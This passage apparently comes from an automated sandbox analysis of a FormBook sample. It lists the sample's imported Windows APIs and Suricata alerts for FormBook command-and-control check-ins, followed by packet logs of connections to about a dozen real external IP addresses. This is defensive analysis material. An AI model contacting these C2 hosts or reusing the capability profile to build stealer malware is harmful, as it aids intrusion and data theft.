                                                        RT_GROUP_ICON0x135a940x14dataEnglishGreat Britain1.15
                                                        RT_GROUP_ICON0x135aa80x14dataEnglishGreat Britain1.25
                                                        RT_VERSION0x135abc0xdcdataEnglishGreat Britain0.6181818181818182
                                                        RT_MANIFEST0x135b980x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                        Imports

                                                        DLLImport
                                                        WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                        VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                        MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                        WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                        PSAPI.DLLGetProcessMemoryInfo
                                                        IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                        USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                        UxTheme.dllIsThemeActive
                                                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentThread, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, EnterCriticalSection, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                        USER32.dllIsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, TranslateMessage, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, GetKeyboardLayoutNameW, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, GetMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, ReleaseDC, GetDC, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, ClientToScreen, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, TrackPopupMenuEx, BlockInput, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, LockWindowUpdate, keybd_event, DispatchMessageW, ScreenToClient
                                                        GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                        SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                        OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishGreat Britain

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-09-18T16:18:05.577568+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.553614148.72.152.17480TCP
                                                        2024-09-18T16:18:05.577568+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.553614148.72.152.17480TCP
                                                        2024-09-18T16:18:21.156053+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5536153.33.130.19080TCP
                                                        2024-09-18T16:18:24.120594+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5536163.33.130.19080TCP
                                                        2024-09-18T16:18:26.381761+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5536173.33.130.19080TCP
                                                        2024-09-18T16:18:29.917543+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5536183.33.130.19080TCP
                                                        2024-09-18T16:18:29.917543+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5536183.33.130.19080TCP
                                                        2024-09-18T16:18:35.831964+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553619172.191.244.6280TCP
                                                        2024-09-18T16:18:38.680882+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553620172.191.244.6280TCP
                                                        2024-09-18T16:18:41.008552+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553621172.191.244.6280TCP
                                                        2024-09-18T16:18:43.557979+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.553622172.191.244.6280TCP
                                                        2024-09-18T16:18:43.557979+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.553622172.191.244.6280TCP
                                                        2024-09-18T16:18:49.784798+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553623172.96.191.3980TCP
                                                        2024-09-18T16:18:52.296428+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553624172.96.191.3980TCP
                                                        2024-09-18T16:18:54.881727+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553625172.96.191.3980TCP
                                                        2024-09-18T16:18:57.440579+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.553626172.96.191.3980TCP
                                                        2024-09-18T16:18:57.440579+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.553626172.96.191.3980TCP
                                                        2024-09-18T16:19:03.216710+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553627217.70.184.5080TCP
                                                        2024-09-18T16:19:05.792242+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553628217.70.184.5080TCP
                                                        2024-09-18T16:19:08.348795+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553629217.70.184.5080TCP
                                                        2024-09-18T16:19:11.055033+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.553630217.70.184.5080TCP
                                                        2024-09-18T16:19:11.055033+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.553630217.70.184.5080TCP
                                                        2024-09-18T16:19:17.368469+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55363163.250.47.4080TCP
                                                        2024-09-18T16:19:19.914771+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55363263.250.47.4080TCP
                                                        2024-09-18T16:19:22.516389+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55363363.250.47.4080TCP
                                                        2024-09-18T16:19:25.013615+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55363463.250.47.4080TCP
                                                        2024-09-18T16:19:25.013615+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55363463.250.47.4080TCP
                                                        2024-09-18T16:19:30.690959+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55363591.184.0.20080TCP
                                                        2024-09-18T16:19:33.214822+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55363691.184.0.20080TCP
                                                        2024-09-18T16:19:35.871779+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55363791.184.0.20080TCP
                                                        2024-09-18T16:19:38.348985+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55363891.184.0.20080TCP
                                                        2024-09-18T16:19:38.348985+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55363891.184.0.20080TCP
                                                        2024-09-18T16:19:43.847494+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55363913.248.169.4880TCP
                                                        2024-09-18T16:19:46.397678+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55364013.248.169.4880TCP
                                                        2024-09-18T16:19:48.946030+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55364113.248.169.4880TCP
                                                        2024-09-18T16:19:51.502607+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55364213.248.169.4880TCP
                                                        2024-09-18T16:19:51.502607+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55364213.248.169.4880TCP
                                                        2024-09-18T16:20:11.912872+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55364743.242.202.16980TCP
                                                        2024-09-18T16:20:14.674893+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55364843.242.202.16980TCP
                                                        2024-09-18T16:20:17.276409+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55364943.242.202.16980TCP
                                                        2024-09-18T16:20:19.922706+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55365043.242.202.16980TCP
                                                        2024-09-18T16:20:19.922706+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55365043.242.202.16980TCP
                                                        2024-09-18T16:20:26.996004+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553651103.224.182.24280TCP
                                                        2024-09-18T16:20:29.401854+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553652103.224.182.24280TCP
                                                        2024-09-18T16:20:32.377082+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553653103.224.182.24280TCP
                                                        2024-09-18T16:20:34.796371+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.553654103.224.182.24280TCP
                                                        2024-09-18T16:20:34.796371+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.553654103.224.182.24280TCP
                                                        2024-09-18T16:20:41.459514+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55365585.159.66.9380TCP
                                                        2024-09-18T16:20:44.006797+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55365685.159.66.9380TCP
                                                        2024-09-18T16:20:46.552932+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55365785.159.66.9380TCP
                                                        2024-09-18T16:20:48.479195+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55365885.159.66.9380TCP
                                                        2024-09-18T16:20:48.479195+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55365885.159.66.9380TCP
                                                        2024-09-18T16:20:54.781314+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553659188.114.97.380TCP
                                                        2024-09-18T16:20:57.207720+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553660188.114.97.380TCP
                                                        2024-09-18T16:20:59.708283+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553661188.114.97.380TCP
                                                        2024-09-18T16:21:02.598834+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.553662188.114.97.380TCP
                                                        2024-09-18T16:21:02.598834+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.553662188.114.97.380TCP
                                                        2024-09-18T16:21:08.364978+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55366313.248.169.4880TCP
                                                        2024-09-18T16:21:10.922448+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55366413.248.169.4880TCP
                                                        2024-09-18T16:21:13.470593+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55366513.248.169.4880TCP
                                                        2024-09-18T16:21:16.091718+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55366613.248.169.4880TCP
                                                        2024-09-18T16:21:16.091718+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55366613.248.169.4880TCP
                                                        2024-09-18T16:21:38.233370+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553667148.72.152.17480TCP
                                                        2024-09-18T16:21:40.764371+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553668148.72.152.17480TCP
                                                        2024-09-18T16:21:43.352378+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.553669148.72.152.17480TCP
                                                        2024-09-18T16:21:45.848266+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.553670148.72.152.17480TCP
                                                        2024-09-18T16:21:45.848266+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.553670148.72.152.17480TCP
                                                        2024-09-18T16:21:51.341563+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5536713.33.130.19080TCP
                                                        2024-09-18T16:21:54.000396+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5536723.33.130.19080TCP
                                                        2024-09-18T16:21:56.455893+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5536733.33.130.19080TCP
                                                        2024-09-18T16:21:58.973358+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5536743.33.130.19080TCP
                                                        2024-09-18T16:21:58.973358+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5536743.33.130.19080TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 18, 2024 16:18:05.050137043 CEST5361480192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:18:05.055102110 CEST8053614148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:18:05.055224895 CEST5361480192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:18:05.061590910 CEST5361480192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:18:05.066431046 CEST8053614148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:18:05.577068090 CEST8053614148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:18:05.577502012 CEST8053614148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:18:05.577568054 CEST5361480192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:18:05.579901934 CEST5361480192.168.2.5148.72.152.174
                                                        Sep 18, 2024 16:18:05.584724903 CEST8053614148.72.152.174192.168.2.5
                                                        Sep 18, 2024 16:18:20.646343946 CEST5361580192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:20.651235104 CEST80536153.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:18:20.651325941 CEST5361580192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:20.662254095 CEST5361580192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:20.667177916 CEST80536153.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:18:21.155921936 CEST80536153.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:18:21.156053066 CEST5361580192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:22.177793026 CEST5361580192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:22.183109045 CEST80536153.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:18:23.197460890 CEST5361680192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:23.266459942 CEST80536163.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:18:23.266606092 CEST5361680192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:23.280239105 CEST5361680192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:23.584000111 CEST5361680192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:23.613094091 CEST80536163.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:18:23.613161087 CEST80536163.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:18:24.120495081 CEST80536163.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:18:24.120594025 CEST5361680192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:24.787178040 CEST5361680192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:24.897387028 CEST80536163.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:18:25.806138992 CEST5361780192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:25.825120926 CEST80536173.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:18:25.825356960 CEST5361780192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:25.836359978 CEST5361780192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:25.854496002 CEST80536173.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:18:25.857568026 CEST80536173.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:18:26.381587982 CEST80536173.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:18:26.381761074 CEST5361780192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:27.349534988 CEST5361780192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:27.371300936 CEST80536173.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:18:28.368521929 CEST5361880192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:28.394437075 CEST80536183.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:18:28.394522905 CEST5361880192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:28.402077913 CEST5361880192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:28.412573099 CEST80536183.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:18:29.914180040 CEST80536183.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:18:29.917457104 CEST80536183.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:18:29.917542934 CEST5361880192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:29.918250084 CEST5361880192.168.2.53.33.130.190
                                                        Sep 18, 2024 16:18:29.929670095 CEST80536183.33.130.190192.168.2.5
                                                        Sep 18, 2024 16:18:35.313318968 CEST5361980192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:35.318274975 CEST8053619172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:35.318391085 CEST5361980192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:35.423499107 CEST5361980192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:35.428531885 CEST8053619172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:35.831392050 CEST8053619172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:35.831907988 CEST8053619172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:35.831964016 CEST5361980192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:35.855048895 CEST8053619172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:35.855113029 CEST5361980192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:36.958894014 CEST5361980192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:37.978955984 CEST5362080192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:37.984117031 CEST8053620172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:37.984252930 CEST5362080192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:37.999349117 CEST5362080192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:38.004769087 CEST8053620172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:38.680747032 CEST8053620172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:38.680805922 CEST8053620172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:38.680834055 CEST8053620172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:38.680881977 CEST5362080192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:38.680915117 CEST5362080192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:39.505824089 CEST5362080192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:40.524406910 CEST5362180192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:40.529385090 CEST8053621172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:40.529496908 CEST5362180192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:40.541198969 CEST5362180192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:40.546120882 CEST8053621172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:40.546206951 CEST8053621172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:41.007587910 CEST8053621172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:41.008466959 CEST8053621172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:41.008552074 CEST5362180192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:42.052772045 CEST5362180192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:43.071258068 CEST5362280192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:43.081170082 CEST8053622172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:43.081269979 CEST5362280192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:43.088589907 CEST5362280192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:43.093374968 CEST8053622172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:43.557492971 CEST8053622172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:43.557898998 CEST8053622172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:43.557979107 CEST5362280192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:43.560534954 CEST5362280192.168.2.5172.191.244.62
                                                        Sep 18, 2024 16:18:43.565748930 CEST8053622172.191.244.62192.168.2.5
                                                        Sep 18, 2024 16:18:48.839404106 CEST5362380192.168.2.5172.96.191.39
                                                        Sep 18, 2024 16:18:48.844702959 CEST8053623172.96.191.39192.168.2.5
                                                        Sep 18, 2024 16:18:48.844799042 CEST5362380192.168.2.5172.96.191.39
                                                        Sep 18, 2024 16:18:48.856637955 CEST5362380192.168.2.5172.96.191.39
                                                        Sep 18, 2024 16:18:48.864528894 CEST8053623172.96.191.39192.168.2.5
                                                        Sep 18, 2024 16:18:49.783720970 CEST8053623172.96.191.39192.168.2.5
                                                        Sep 18, 2024 16:18:49.784730911 CEST8053623172.96.191.39192.168.2.5
                                                        Sep 18, 2024 16:18:49.784797907 CEST5362380192.168.2.5172.96.191.39
